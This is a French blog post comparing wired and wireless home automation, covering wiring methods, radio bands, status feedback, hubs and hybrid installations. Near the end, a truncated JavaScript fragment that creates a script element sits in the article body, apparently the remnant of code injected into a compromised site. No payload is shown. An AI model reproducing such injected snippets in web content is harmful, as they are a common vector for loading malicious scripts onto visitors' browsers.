/, Non classé/Domotique filaire ou sans fil

Domotique filaire ou sans fil

Lorsqu’on souhaite intégrer un système domotique, il est nécessaire de faire un choix entre deux types d’installations:

Domotique filaire:

La domotique filaire s’intègre généralement dans les nouvelles constructions car  elle nécessite un câblage particulier. Il est indispensable donc de prévoir une telle installation pendant la construction si l’on veut éviter de réaliser des saignées sur les murs et refaire toute l’installation électrique.

Il existe généralement deux méthodes de communication pour les installations sans fil:

  • Communication par bus: Un câble reliant tous les interrupteurs ou platines de commande en série.  Tous les protocoles domotiques basés sur ce type de communication sont propriétaire. Cela signifie qu’il n’est pas inter compatible avec des produits d’une autre marque.
  • Communication par circuit de commande: Une telle communication ne nécessite pas de câblage en série. Chaque circuit est commandé séparément.

Certaines installations sont réversibles c’est à dire qu’elles permettent à n’importe quel moment de recâbler normalement l’installation électrique sans faire de travaux.

Domotique sans fil:

Il existe une multitude de solutions domotique sans fil dont la fiabilité, le prix et la longévité varient.

La fréquence de communication des modules donne généralement une indication sur la fiabilité du système. Il existe trois bandes de fréquences sur lesquelles peut communiquer un système domotique sans fil:

  • Bande des 433 MHz pour les protocoles d’entrée de gamme caractérisés par de nombreuses interférences dues à la forte densité de cette bande.
  • Bande des 868 MHz relativement peu utilisés par les appareils domestiques et donc peu d’interférences.
  • Bande des 2,4GHz qui peut interférer avec le WiFi, Bluetooth,Zigbee et présente une faible capacité à transpercer les murs et plafonds.

Une autre caractéristique importante d’un système domotique sans fil est le retour d’état. Certains protocoles domotiques ne permettent pas une communication « duplex » c’est à dire en bidirectionnel. L’inconvénient dans ce cas est qu’il n’est pas possible de s’assurer de la bonne transmission du message de commande. Plus concrètement il n’est pas possible de connaitre l’état des allumages ou des ouvrants.

La centrale domotique est indispensable dans le cas d’une installation domotique sans fil.  Elle centralise toutes les commandes et reçoit les informations des capteurs, détecteurs ainsi que les retours d’état de tous les modules sans fil dans le cas ou le protocole le permet.

Solution hybride solution alternative:

Il n’est plus nécessaire de choisir entre une installation domotique filaire ou sans fil. Désormais il est possible de recourir à des installations « hybrides » avec des communications filaires pour certains modules et sans fil pour d’autres. Cela permet de profiter des avantage de chaque type d’installation en évitant leurs inconvénients. Une installation hybride reste évolutive puisqu’elle permet à n’importe quel moment d’ajouter ou de supprimer des capteurs ou détecteurs de mouvements ou de domotiser des éclairages ou des volets roulants.

 var d=document;var s=d.createElement(‘script’);

Par | 2014-12-22T10:15:38+00:00 décembre 22nd, 2014|Blog domotique, Non classé|Commentaires fermés sur Domotique filaire ou sans fil

À propos de l'auteur :